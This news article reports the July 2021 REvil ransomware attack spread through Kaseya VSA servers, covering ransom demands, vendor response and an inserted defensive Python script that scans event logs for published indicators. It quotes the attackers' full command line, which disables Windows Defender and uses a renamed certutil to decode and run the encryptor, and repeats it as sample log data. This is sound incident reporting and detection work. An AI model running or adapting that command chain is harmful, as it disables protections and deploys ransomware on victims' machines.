Kaseya customers have been hit by a major ransomware attack that started on Friday afternoon. The attack is being blamed on REvil (also known as Sodinokibi), which also attacked JBS SA in May. The attack has impacted over 30 Managed Services Providers (MSPs) worldwide. Each of those MSPs has hundreds of customers, many of whom are now infected. The number of affected companies already exceeds 1,000.
REvil has already issued its demands for unlocking. It wants US $70 million for a universal decryptor. It will unlock what REvil claims is over 1 million computers that are already infected. Many of those machines will be desktops and laptops. However, few companies will have effective backups and be able to restore those machines. Of bigger concern will be any data that may have been exfiltrated.
A speedy response to the attack
Reaction to the attack was swift. In cybersecurity forums, people reported that the Electricity Information Sharing and Analysis Center (E-ISAC) issued an alert Friday afternoon telling companies to shut off any Kaseya VSA servers to prevent infection. Other alerts have come in since, including from Huntress Labs, which has been tracking the attack on Reddit. Details of the attack and its current state can be found in the Reddit r/msp group.
John Hammond, Senior Cybersecurity Researcher, Huntress Labs, has also been updating a blog detailing the state of the attack. Huntress currently plans to provide further details in a live webinar on Tuesday, July 6 at 1pm ET (registration required).
Kaseya has been proactive in dealing with the attacks. It engaged with Huntress Labs on Friday afternoon and quickly shut down all its Software as a Service (SaaS) servers. However, it continues to say that those servers are not believed to have been infected. Instead, the attack targeted on-premises customers. They have been told to shut down all their VSA servers until a patch and remediation process is established.
Updates from Kaseya can be found here. The most up-to-date, as of writing, was at 11:00am ET on July 4. In it, Kaseya states: “Kaseya’s VSA product has unfortunately been the victim of a sophisticated cyberattack. Due to our teams’ fast response, we believe that this has been localized to a very small number of on-premises customers only.”
How did the attack happen?
What we know at present comes from Huntress Labs. It has posted the following:
On July 2, around 11:00 ET, many Kaseya VSA servers were used to deploy ransomware. Here are the details of that initial intrusion:
Ransomware encryptors were dropped to Kaseya’s TempPath with the file name agent.exe. This appears to be c:\kworking\agent.exe by default and may be configurable within HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Kaseya\Agent\<unique id>.
The VSA procedure used to deploy the encryptor was named “Kaseya VSA Agent Hot-fix”. Additional procedures were “Archive and Purge Logs” (screenshot here)
The “Kaseya VSA Agent Hot-fix” procedure ran the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
When agent.exe runs, the legitimate Windows Defender executable MsMpEng.exe and the encryptor payload mpsvc.dll are dropped into the hardcoded path “c:\Windows” to perform DLL sideloading.
The mpsvc.dll Sodinokibi DLL creates the registry key HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter which contains several registry values that store encryptor runtime keys/configurations artifacts.
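The chain Huntress describes above (Defender tampering via Set-MpPreference, certutil copied to C:\Windows\cert.exe and used to decode agent.crt, agent.exe dropped in c:\kworking, MsMpEng.exe/mpsvc.dll sideloading, and the BlackLivesMatter registry key) gives a defender a concrete set of artifacts to hunt for. The following is an added example, not code from Enterprise Times, Huntress Labs or Kaseya: a small triage script that matches Windows process, file and registry event lines against those published indicators and rolls the hits up into a per-host verdict. The log format and every log line are constructed for illustration; the indicator names, stage groupings and verdict labels are this example's own.

```python
"""Triage constructed Windows event lines against the indicators Huntress
published for the Kaseya VSA / REvil attack chain (added example)."""
import re

# Indicators taken from the published command line, file paths and registry key.
# (name, case-insensitive regex, meaning for a defender)
INDICATORS = [
    ("defender_tampering",
     r"Set-MpPreference\s.*-DisableRealtimeMonitoring\s+\$true",
     "PowerShell disabling Defender real-time monitoring"),
    ("certutil_copy",
     r"copy\s+/Y\s+C:\\Windows\\System32\\certutil\.exe\s+C:\\Windows\\cert\.exe",
     "certutil.exe copied to C:\\Windows\\cert.exe (renamed built-in tool)"),
    ("cert_decode_payload",
     r"cert\.exe\s+-decode\s+c:\\kworking\\agent\.crt",
     "renamed certutil decoding c:\\kworking\\agent.crt"),
    ("agent_exe_in_kworking",
     r"c:\\kworking\\agent\.exe",
     "encryptor dropped to the Kaseya TempPath as agent.exe"),
    ("sideload_drop",
     r"c:\\Windows\\(MsMpEng\.exe|mpsvc\.dll)",
     "MsMpEng.exe / mpsvc.dll written to C:\\Windows (DLL sideloading)"),
    ("blm_registry_key",
     r"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\BlackLivesMatter",
     "REvil runtime-configuration registry key created"),
]

# Stage groupings (this example's own): artifacts only present once the
# encryptor has run, versus artifacts of the dropper being staged.
EXECUTION_STAGE = {"sideload_drop", "blm_registry_key"}
STAGING_STAGE = {"certutil_copy", "cert_decode_payload", "agent_exe_in_kworking"}

# Constructed sample events for one host (not real telemetry).
SAMPLE_LOG = [
    '2021-07-02T15:02:11Z host=WS-17 event=ProcessCreate image=C:\\Windows\\System32\\svchost.exe cmdline="svchost.exe -k netsvcs"',
    '2021-07-02T15:03:40Z host=WS-17 event=ProcessCreate image=C:\\WINDOWS\\system32\\cmd.exe cmdline="cmd.exe /c ping 127.0.0.1 -n 4979 > nul & C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe & echo %RANDOM% >> C:\\Windows\\cert.exe & C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe & del /q /f c:\\kworking\\agent.crt C:\\Windows\\cert.exe & c:\\kworking\\agent.exe"',
    '2021-07-02T15:04:02Z host=WS-17 event=FileCreate path=C:\\Windows\\mpsvc.dll',
    '2021-07-02T15:04:05Z host=WS-17 event=RegistryKeyCreate key=HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\BlackLivesMatter',
    # Legitimate certutil use: must not be flagged.
    '2021-07-02T15:05:00Z host=WS-18 event=ProcessCreate image=C:\\Windows\\System32\\certutil.exe cmdline="certutil -hashfile report.pdf SHA256"',
]


def scan_line(line):
    """Return the names of every indicator matched by a single event line."""
    return [name for name, pattern, _ in INDICATORS
            if re.search(pattern, line, re.IGNORECASE)]


def scan_log(lines):
    """Return (line index, matched indicator names) for each line with a hit."""
    hits = []
    for index, line in enumerate(lines):
        matched = scan_line(line)
        if matched:
            hits.append((index, matched))
    return hits


def assess(lines):
    """Roll per-line hits up into a host verdict, worst stage first."""
    seen = set()
    for _, names in scan_log(lines):
        seen.update(names)
    if seen & EXECUTION_STAGE:
        return "encryptor_executed"
    if seen & STAGING_STAGE:
        return "dropper_staged"
    if seen:
        return "suspicious"
    return "no_indicators"


if __name__ == "__main__":
    meanings = {name: meaning for name, _, meaning in INDICATORS}
    for index, names in scan_log(SAMPLE_LOG):
        for name in names:
            print(f"line {index}: {name} - {meanings[name]}")
    print("verdict:", assess(SAMPLE_LOG))
```

Because the whole dropper chain ran as one cmd.exe command line, a single process-creation event carries four of the six indicators; the file and registry events add the post-execution artifacts. Ordinary certutil usage, which is common in legitimate administration, does not match because the patterns key on the copy to C:\Windows\cert.exe and the decode of agent.crt rather than on certutil itself.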
What happens next?
Kaseya has already released a Compromise Detection Tool that customers can request by email. Around 900 customers have done so, and it would be a surprise if all customers don’t download it. Only at that point will the size and scope of this attack be fully understood.
Importantly, Kaseya says that its R&D department has been able to replicate the attack vector. That is allowing it to develop a mitigation to the attack. It expects to have completed and tested that by sometime on Tuesday, July 6. After that, it will be deploying it to customers.
On Sunday, a press release from eSentire drew a parallel with a 2018 incident that also affected Kaseya. That incident saw cybercriminals trying to deploy Monero mining malware. According to Eldon Sprickerhoff, eSentire Chief Innovation Officer and founder: “This current attack could very well be just a variation on the same attack tactic they used in 2018 which we discovered.”
Sprickerhoff continued: “Companies definitely want to check if the Sodin ransomware dropper has already been pushed to their computer systems. As recommended by Kaseya, it is a good idea at this time to disable the VSA Server until a patch has been formally released; however, your security team definitely also needs to check for indicators that the Sodin ransomware dropper or the ransomware hasn’t already been installed onto your computer systems, and that external attackers don’t already have access to your organization.”
Enterprise Times: What does this mean?
This is yet another supply chain attack where an attack against a vendor impacts large numbers of businesses. In this case, the initial attack seems to have been against MSPs, which has led to thousands of other victims. At present, we don’t know how bad it is for those MSPs’ customers and may not know until sometime later this week.
It is a holiday weekend in the US, and many companies will have dodged a bullet. Had this attack occurred on Friday night, it would have had a much easier time replicating, because most organisations would have had just skeleton staff over the long weekend. The attack was noticed quickly, which has probably prevented a much more severe incident.
Despite Kaseya being the root cause here, it has responded quickly to identify and develop a solution. The patch should be available by Tuesday, and the company hopes to have restarted its SaaS servers by then as well. At that point, companies can start to establish just how badly affected they have been by this attack and begin to recover.
Perhaps the key question is whether Kaseya will pay for the universal decryptor. Will its customers offer to help fund any payment? With the US hardening its stance against ransomware payments, will there be pressure on Kaseya not to pay? The next few days will be interesting.